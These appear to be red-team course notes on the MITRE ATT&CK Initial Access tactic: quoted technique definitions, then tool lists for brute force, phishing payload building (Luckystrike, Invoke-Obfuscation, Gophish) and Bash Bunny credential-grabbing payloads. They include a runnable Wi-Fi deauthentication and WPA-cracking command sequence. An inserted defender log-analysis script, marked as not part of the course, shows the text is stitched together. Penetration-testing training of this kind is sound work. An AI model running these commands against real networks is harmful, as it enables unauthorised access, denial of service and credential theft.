Welcome to session three of the MITRE ATT&CK course. To access the video, see the link below:

Initial Access is the set of techniques by which the threat actor (TA) carries out the initial intrusion. These techniques include spearphishing and exploiting entry points. Sometimes initial access is gained with a stolen valid account: the attacker enters the network with the privileges of an ordinary user (an employee) and carries out the next steps from there.

To gain initial access in simulation projects, we first have to study the TTPs. Over 90 percent of initial accesses have been achieved through phishing, so the malicious file that is sent to organizations during phishing matters a great deal.

It is a set of techniques that help the attacker reach the internal network. These techniques may rely on phishing, exploitation of a vulnerability, or the use of leaked or purchased usernames and passwords.

ATT&CK – Initial Access (TA0001)

The adversary is trying to get into your network.

Initial Access consists of techniques that use various entry vectors to gain their initial foothold within a network. Techniques used to gain a foothold include targeted spearphishing and exploiting weaknesses on public-facing web servers. Footholds gained through initial access may allow for continued access, like valid accounts and use of external remote services, or may be limited-use due to changing passwords.


The watering hole attack, or drive-by compromise, is one of the hardest attacks to carry out, because it requires gaining access to a very popular website and infecting that site in order to infect the victims (the employees of a particular organization).

Drive-by Compromise  T1189 [Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. With this technique, the user’s web browser is typically targeted for exploitation, but adversaries may also use compromised websites for non-exploitation behavior such as acquiring Application Access Token.]

Another initial-access method is entry through the organization's gateway: any part of the organization's infrastructure that is exposed to the internet and can be exploited gives threat actors an opportunity to intrude.

Exploit Public-Facing Application   T1190 [Adversaries may attempt to take advantage of a weakness in an Internet-facing computer or program using software, data, or commands in order to cause unintended or unanticipated behavior. The weakness in the system can be a bug, a glitch, or a design vulnerability. These applications are often websites, but can include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other applications with Internet accessible open sockets, such as web servers and related services. Depending on the flaw being exploited this may include Exploitation for Defense Evasion.]

External Remote Services  T1133 [Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as Windows Remote Management and VNC can also be used externally.]

Hardware Additions T1200 [Adversaries may introduce computer accessories, networking hardware, or other computing devices into a system or network that can be used as a vector to gain access. Rather than just connecting and distributing payloads via removable storage (i.e. Replication Through Removable Media), more robust hardware additions can be used to introduce new functionalities and/or features into a system that can then be abused.]

A 0day called phishing

"Give someone a 0day and they will have access for a day; teach them phishing and they will have access for a lifetime."

Phishing    T1566  [Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.]

    Spearphishing Attachment [Adversaries may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems. Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon User Execution to gain execution. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.]

    Spearphishing Link [Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.]

    Spearphishing via Service [Adversaries may send spearphishing messages via third-party services in an attempt to gain access to victim systems. Spearphishing via service is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of third party services rather than directly via enterprise email channels.]

Using tampered hardware to gain initial access

Replication Through Removable Media  T1091 [Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media’s firmware itself.]

Supply Chain Compromise T1195 [Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise.]

    Compromise Software Dependencies and Development Tools [Adversaries may manipulate software dependencies and development tools prior to receipt by a final consumer for the purpose of data or system compromise. Applications often depend on external software to function properly. Popular open source projects that are used as dependencies in many applications may be targeted as a means to add malicious code to users of the dependency.]

    Compromise Software Supply Chain [Adversaries may manipulate application software prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise of software can take place in a number of ways, including manipulation of the application source code, manipulation of the update/distribution mechanism for that software, or replacing compiled releases with a modified version.]

    Compromise Hardware Supply Chain [Adversaries may manipulate hardware components in products prior to receipt by a final consumer for the purpose of data or system compromise. By modifying hardware or firmware in the supply chain, adversaries can insert a backdoor into consumer networks that may be difficult to detect and give the adversary a high degree of control over the system. Hardware backdoors may be inserted into various devices, such as servers, workstations, network infrastructure, or peripherals.]

Trusted Relationship    T1199 [Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship abuses an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network.]

Initial access with valid accounts that were previously extracted from leaked databases or purchased.

Valid Accounts  T1078 [Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.]

    Default Accounts [Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.]

    Domain Accounts [Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.]

    Local Accounts [Adversaries may obtain and abuse credentials of a local account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service.]

    Cloud Accounts [Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. In some cases, cloud accounts may be federated with traditional identity management system, such as Window Active Directory.]


^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Brute force tool list

Dubrute

Nlbrute

Ncrack

Hydra

Ruler

Burp suite
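As an added, defender-side example that is not part of the course notes: the tools above, used against an external remote service (T1133) with valid accounts (T1078), leave a characteristic trail in authentication logs. The detector below (log format and IP addresses are constructed for this example; thresholds are assumptions) flags a burst of failures against one account, a password spray across many accounts from one source, and a success that follows failures, which is the signal that a guessed or stolen credential is now in use.

```python
# Added example: detect T1110 brute force / password spraying against a
# remote service from auth logs, and flag success-after-failures (T1078).
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=10)   # assumed detection window
FAIL_THRESHOLD = 5               # failures from one IP against one user
SPRAY_THRESHOLD = 4              # distinct users failed from one IP

# Constructed sample log: "<ISO time> user=<name> src=<ip> result=<ok|fail>"
SAMPLE_LOG = """\
2024-03-01T08:00:01 user=alice src=203.0.113.7 result=fail
2024-03-01T08:00:05 user=alice src=203.0.113.7 result=fail
2024-03-01T08:00:09 user=alice src=203.0.113.7 result=fail
2024-03-01T08:00:12 user=alice src=203.0.113.7 result=fail
2024-03-01T08:00:15 user=alice src=203.0.113.7 result=fail
2024-03-01T08:00:20 user=alice src=203.0.113.7 result=ok
2024-03-01T08:05:00 user=bob src=198.51.100.9 result=fail
2024-03-01T08:05:01 user=carol src=198.51.100.9 result=fail
2024-03-01T08:05:02 user=dave src=198.51.100.9 result=fail
2024-03-01T08:05:03 user=erin src=198.51.100.9 result=fail
2024-03-01T09:30:00 user=bob src=192.0.2.4 result=ok
"""

def parse(line):
    """Split one log line into (timestamp, user, source IP, result)."""
    ts, *kv = line.split()
    fields = dict(p.split("=", 1) for p in kv)
    return datetime.fromisoformat(ts), fields["user"], fields["src"], fields["result"]

def analyze(log_text):
    """Return a sorted list of (kind, src_ip, user) findings."""
    fails = defaultdict(list)        # (src, user) -> recent failure times
    users_by_src = defaultdict(set)  # src -> users it has failed against
    findings = set()
    for line in log_text.splitlines():
        ts, user, src, result = parse(line)
        if result == "fail":
            # keep only failures inside the sliding window, then add this one
            recent = [t for t in fails[(src, user)] if ts - t <= WINDOW] + [ts]
            fails[(src, user)] = recent
            users_by_src[src].add(user)
            if len(recent) >= FAIL_THRESHOLD:
                findings.add(("brute_force", src, user))
            if len(users_by_src[src]) >= SPRAY_THRESHOLD:
                findings.add(("password_spray", src, "*"))
        elif any(ts - t <= WINDOW for t in fails[(src, user)]):
            # a login that succeeds right after a failure burst is the
            # moment a valid account (T1078) starts being abused
            findings.add(("success_after_failures", src, user))
    return sorted(findings)
```

The spray check counts distinct failed users per source without a time window; a production rule would window that set too.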


^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Aircrack-ng

T1465 WIFI Access

T1110 Brute Force WPA

T1464  Denial of Service

airmon-ng

Alfa network adapter

aireplay-ng --test wlan0mon

besside-ng wlan0

airmon-ng check kill

airmon-ng start wlan0

airodump-ng wlan0mon

airodump-ng wlan0mon --bssid <bssid> -c <channel> -w ./capture

aircrack-ng capture-01.pcap

airmon-ng stop wlan0mon

aireplay-ng wlan0mon --deauth 20 -a "router" -h "computer"

aircrack-ng -w wordlist wpa2.cap

airmon-ng start wlan0

airodump-ng wlan0

airodump-ng wlan0 --bssid 54:B8:0A:90:7B:B0 -c 8 -w ./capture

aireplay-ng wlan0mon --deauth 20 -a 54:B8:0A:90:7B:B0 -h D0:DF:9A:D8:A1:86

aircrack-ng capture-01.cap

wifite


^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Luckystrike

https://github.com/curi0usJack/luckystrike/wiki

https://github.com/danielbohannon/Invoke-Obfuscation


T1566 Phishing

T1566.001

Spearphishing Attachment

How to install the Luckystrike framework?

GitHub

Install the Invoke-Obfuscation requirement

Run PowerShell as administrator; the PowerShell version must be 5 or later (use Windows 10 or later)

Get-Host (shows the PowerShell version)


^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Gophish

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

sqlmap


^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Bash Bunny

bashbunny-wiki/payload_development.md at master · hak5/bashbunny-wiki · GitHub

Quick creds

Windows meterpreter

Optical exfiltration

Wifipass

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

List of tools and hardware
Wi-Fi hacking:
AWUS036H (EOL)
WiFi Pineapple
https://www.raspberrypi.com/products/raspberry-pi-4-model-b/
https://beagleboard.org/black

Hacking via a flash drive with the Bash Bunny
https://github.com/hak5/bashbunny-payloads

Phishing with Gophish, whose setup was taught in the previous part
https://github.com/gophish/gophish
For easier phishing, use the King Phisher templates
https://github.com/rsmusllp/king-phisher

Building a payload in an extremely simple way
https://github.com/curi0usJack/luckystrike/
https://github.com/danielbohannon/Invoke-Obfuscation

Luckystrike setup tutorial
https://github.com/curi0usJack/luckystrike/wiki

Intrusion via internet-facing services
SQL injection (sqli)
https://github.com/sqlmapproject/sqlmap
https://github.com/digininja/DVWA

Intrusion via brute force using the tools below
https://github.com/sensepost/ruler/wiki/Brute-Force
https://github.com/ch0sys/DUBrute
https://www.hybrid-analysis.com/sample/ffa28db79daca3b93a283ce2a6ff24791956a768cb5fc791c075b638416b51f4
https://github.com/vanhauser-thc/thc-hydra

Tool collection:
https://t.me/Peneter_Tools